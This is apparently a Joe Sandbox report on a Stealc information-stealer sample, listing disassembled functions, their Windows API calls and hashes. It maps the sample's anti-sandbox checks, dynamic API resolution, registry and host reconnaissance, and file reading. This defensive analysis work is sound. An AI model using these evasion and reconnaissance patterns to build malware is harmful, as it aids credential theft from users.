Instruction Fuzzy Hash: CE3106B4A00218ABDB24DF54DC85BDDB7B9FB48704F2081D9EA09A7280C7706EC58F99

Function 006A69F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03AC0), ref: 006A98A1
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03838), ref: 006A98BA
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03A78), ref: 006A98D2
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A038E0), ref: 006A98EA
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A037F0), ref: 006A9903
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A01328), ref: 006A991B
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,009FAE20), ref: 006A9933
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,009FAEE0), ref: 006A994C
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03A90), ref: 006A9964
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03850), ref: 006A997C
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03AA8), ref: 006A9995
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A037D8), ref: 006A99AD
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,009FAF80), ref: 006A99C5
Part of subcall function 006A9860: GetProcAddress.KERNEL32(75900000,00A03820), ref: 006A99DE

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006911D0: ExitProcess.KERNEL32 ref: 00691211

Part of subcall function 00691160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,006A6A17,006B0AEF), ref: 0069116A
Part of subcall function 00691160: ExitProcess.KERNEL32 ref: 0069117E

Part of subcall function 00691110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,006A6A1C), ref: 0069112B
Part of subcall function 00691110: VirtualAllocExNuma.KERNEL32(00000000,?,?,006A6A1C), ref: 00691132
Part of subcall function 00691110: ExitProcess.KERNEL32 ref: 00691143

Part of subcall function 00691220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
Part of subcall function 00691220: __aulldiv.LIBCMT ref: 00691258
Part of subcall function 00691220: __aulldiv.LIBCMT ref: 00691266
Part of subcall function 00691220: ExitProcess.KERNEL32 ref: 00691294

Part of subcall function 006A6770: GetUserDefaultLangID.KERNEL32(?,?,006A6A26,006B0AEF), ref: 006A6774

GetUserDefaultLCID.KERNEL32 ref: 006A6A26

Part of subcall function 00691190: ExitProcess.KERNEL32 ref: 006911C6

Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
Part of subcall function 006A7850: HeapAlloc.KERNEL32(00000000,?,?,?,006911B7), ref: 006A7887
Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006A6A2B), ref: 006A7910
Part of subcall function 006A78E0: HeapAlloc.KERNEL32(00000000,?,?,?,006A6A2B), ref: 006A7917
Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A01348,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A6AE8
CloseHandle.KERNEL32(00000000), ref: 006A6AF9
Sleep.KERNEL32(00001770), ref: 006A6B04
CloseHandle.KERNEL32(?,00000000,?,00A01348,?,006B110C,?,00000000,?,006B1110,?,00000000,006B0AEF), ref: 006A6B1A
ExitProcess.KERNEL32 ref: 006A6B22

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: cc8a82283236e1be86d310a737030c30d92238e8bc90ee1ccf234efc48b96793
Instruction ID: d5c4f1bd82f38b69b91021cef487c75f9839e3a0866db010f564d4b6d5d3740c
Opcode Fuzzy Hash: cc8a82283236e1be86d310a737030c30d92238e8bc90ee1ccf234efc48b96793
Instruction Fuzzy Hash: 95313E70910209AADB84F7F0DC56BEE777AAF06300F20461EF212A6192DF745D05CFAA

Function 006A83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
wsprintfA.USER32 ref: 006A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 006A847B
RegCloseKey.ADVAPI32(00000000), ref: 006A848C
RegCloseKey.ADVAPI32(00000000), ref: 006A8499

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

RegQueryValueExA.KERNEL32(00000000,00A103F8,00000000,000F003F,?,00000400), ref: 006A84EC
lstrlenA.KERNEL32(?), ref: 006A8501
RegQueryValueExA.KERNEL32(00000000,00A102D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006B0B34), ref: 006A8599
RegCloseKey.KERNEL32(00000000), ref: 006A8608
RegCloseKey.ADVAPI32(00000000), ref: 006A861A

Strings

%s\%s, xrefs: 006A844D

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 0ccc79e6871c36e4af75b18bd0d4d0f635bed5887a335696cd58c48181d64ae4
Instruction ID: b1af3d04a59c19f12e0f728aae7494639a94d19474fa96d982f8216720bfb077
Opcode Fuzzy Hash: 0ccc79e6871c36e4af75b18bd0d4d0f635bed5887a335696cd58c48181d64ae4
Instruction Fuzzy Hash: A3210AB19012189FDB68DB54DC85FE9B7B9FB48700F10C199E60996140DF71AE85CFD4

Function 006947B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 006947EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00694818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00694839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Strings

<, xrefs: 006947C9

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 0bcc765645807926ed7e6c7f1c064d95adfaa76fcae13bef03af2f9fb34db061
Instruction ID: 003ffd924f671015986a3765ccee0a8d93fc836b22af1c304e149e3904d5a415
Opcode Fuzzy Hash: 0bcc765645807926ed7e6c7f1c064d95adfaa76fcae13bef03af2f9fb34db061
Instruction Fuzzy Hash: EB215EB1D00209ABDF14EFA4E845BDD7B75FF05320F108229F915A7290EB706A15CF95

Function 006A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A76A4
HeapAlloc.KERNEL32(00000000), ref: 006A76AB
RegOpenKeyExA.KERNEL32(80000002,00A0B620,00000000,00020119,00000000), ref: 006A76DD
RegQueryValueExA.KERNEL32(00000000,00A10380,00000000,00000000,?,000000FF), ref: 006A76FE
RegCloseKey.ADVAPI32(00000000), ref: 006A7708

Strings

Windows 11, xrefs: 006A76BD

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
Instruction ID: 88fc5fa67054846b9f33120d83a2612d5a5b64bcb71a355b302ef9abf83a141a
Opcode Fuzzy Hash: a86b7ce6f9af7e21b04d3c0cd63d099f5f64e09bd15f6e1220a5a8c91a40aa0b
Instruction Fuzzy Hash: C9014FB5A45204BBEB04EBE4DC49FAEB7B9FB48701F204155FA04A7290D67099009F51

Function 006A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7734
HeapAlloc.KERNEL32(00000000), ref: 006A773B
RegOpenKeyExA.KERNEL32(80000002,00A0B620,00000000,00020119,006A76B9), ref: 006A775B
RegQueryValueExA.KERNEL32(006A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 006A777A
RegCloseKey.ADVAPI32(006A76B9), ref: 006A7784

Strings

CurrentBuildNumber, xrefs: 006A7771

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
Instruction ID: cad26b8189b524b72071b478516a7b74045f5b2b71fb5e484219a4d261cce944
Opcode Fuzzy Hash: 425181f93f701a33c73e7899eae0ed600f1ee4b82947e6fc12d140f2f7938073
Instruction Fuzzy Hash: 9C0144B5A40308BBD704DBE4DC49FAEB7B8FB44701F104559FA05A7281D67059408F51

Function 006A40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006A40D5
RegOpenKeyExA.KERNEL32(80000001,00A10A90,00000000,00020119,?), ref: 006A40F4
RegQueryValueExA.ADVAPI32(?,00A10488,00000000,00000000,00000000,000000FF), ref: 006A4118
RegCloseKey.ADVAPI32(?), ref: 006A4122
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 006A4147
lstrcatA.KERNEL32(?,00A10560), ref: 006A415B

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 4b07b42fd3fb77cd3d6bb73581b75b4ea4fd0adf77a7747156759816df36f4d5
Instruction ID: d75f2194d8d77964aaec1d40af1cf15453f90fe6cf63b1904440ce9a2f1e229e
Opcode Fuzzy Hash: 4b07b42fd3fb77cd3d6bb73581b75b4ea4fd0adf77a7747156759816df36f4d5
Instruction Fuzzy Hash: BB41D7B6D001086BDF18FBA0DC56FFE733EBB89300F50465DB61657181EA755B888BA2

Function 006999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
ReadFile.KERNEL32(000000FF,?,00000000,006A02E7,00000000), ref: 00699A5A
LocalFree.KERNEL32(006A02E7), ref: 00699A90
CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 1f8dbbe5c6672a4dafc564bab72d87182af3c4e236525579a6e8ad5f2e361d3c
Instruction ID: 374a7525219daaa603970d033f96fe29f3dace69886ff5ff1bd48f848da10ecb
Opcode Fuzzy Hash: 1f8dbbe5c6672a4dafc564bab72d87182af3c4e236525579a6e8ad5f2e361d3c
Instruction Fuzzy Hash: 3031E2B4A00209EFDF14CF94C885BEE77BAFF48350F208159E911A7290D779AA41CFA1

Function 00691220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0069123E
__aulldiv.LIBCMT ref: 00691258
__aulldiv.LIBCMT ref: 00691266
ExitProcess.KERNEL32 ref: 00691294

Strings

@, xrefs: 00691233

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
